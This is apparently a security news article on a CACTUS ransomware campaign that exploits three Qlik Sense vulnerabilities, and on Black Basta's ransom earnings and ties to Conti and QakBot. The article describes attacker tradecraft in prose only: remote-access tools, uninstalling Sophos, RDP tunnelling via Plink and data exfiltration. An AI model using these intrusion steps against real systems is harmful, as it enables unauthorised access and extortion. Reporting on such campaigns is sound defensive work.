CACTUS Ransomware

Cybersecurity researchers are warning about a CACTUS Ransomware campaign capitalizing on newly disclosed security vulnerabilities within the Qlik Sense, a cloud analytics and business intelligence platform. This campaign represents a noteworthy development as it signifies the first documented case where malicious actors utilizing the CACTUS Ransomware have leveraged vulnerabilities in the Qlik Sense as their primary method to gain initial access into targeted environments. This underscores the evolving tactics employed by threat actors to exploit weaknesses in popular software platforms for unauthorized access and potential data compromise.

The CACTUS Ransomware is Delivered via Several Software Vulnerabilities

Cybersecurity analysts have identified a series of attacks that appear to exploit three disclosed vulnerabilities spanning several months:

• CVE-2023-41265 (CVSS score: 9.9) - This vulnerability involves HTTP Request Tunneling, enabling a remote attacker to elevate their privileges and send requests executed by the backend server hosting the repository application.
•  CVE-2023-41266 (CVSS score: 6.5) - A path traversal vulnerability that allows an unauthenticated, remote attacker to transmit HTTP requests to unauthorized endpoints.
•  CVE-2023-48365 (CVSS score: 9.9) - An unauthenticated, remote code execution vulnerability resulting from improper validation of HTTP headers, allowing a remote attacker to elevate their privileges through tunneling HTTP requests.

It's important to note that CVE-2023-48365 is a consequence of an incomplete patch for CVE-2023-41265. Both vulnerabilities, along with CVE-2023-41266, were disclosed in late August 2023, and a fix for CVE-2023-48365 was implemented on September 20, 2023.

In the observed the CACTUS Ransomware attacks, the identified vulnerabilities are exploited, leading to the misuse of the Qlik Sense Scheduler service. This enables the attackers to spawn processes designed to download additional tools with the aim of establishing persistence and setting up remote control.

The additional tools involved in these attacks include the ManageEngine Unified Endpoint Management and Security (UEMS), AnyDesk, and Plink. Notably, the threat actors have been observed uninstalling Sophos software, changing the administrator account password, and creating an RDP tunnel via Plink. The attack chains ultimately result in the deployment of the CACTUS Ransomware, with the attackers also utilizing clones for data exfiltration. This comprehensive attack strategy underscores the sophisticated and multi-stage nature of the CACTUS Ransomware campaign.

Ransomware Threat Actors are Evolving Their Techniques

The emergence of the CACTUS Ransomware reflects the increasing sophistication of the ransomware threat landscape. The underground economy has evolved to support large-scale attacks through a network of initial access brokers and botnet owners. These entities resell access to victim systems to multiple affiliate actors, contributing to the expansion of ransomware threats.

Despite global efforts by governments to combat ransomware, the Ransomware-as-a-Service (RaaS) business model remains a resilient and profitable method for extorting money from targets. The longevity and profitability of this model persist, allowing threat actors to adapt and continue their illicit activities.

One notable ransomware group, Black Basta, entered the scene in April 2022 and is estimated to have amassed illicit profits exceeding $107 million in Bitcoin ransom payments from over 90 victims. Recent joint research has revealed that a significant portion of these funds was laundered through Garantex, a Russian cryptocurrency exchange sanctioned by the U.S. government in April 2022 for facilitating transactions with the Hydra Dark Net marketplace.

Furthermore, the analysis has uncovered connections between Black Basta and the now-defunct Russian cybercrime group Conti, which ceased operations around the same time as Black Basta's emergence. Additionally, ties to QakBot, a tool used in deploying the ransomware, have been identified. This intricate web of associations underscores the complex and interconnected nature of modern ransomware operations.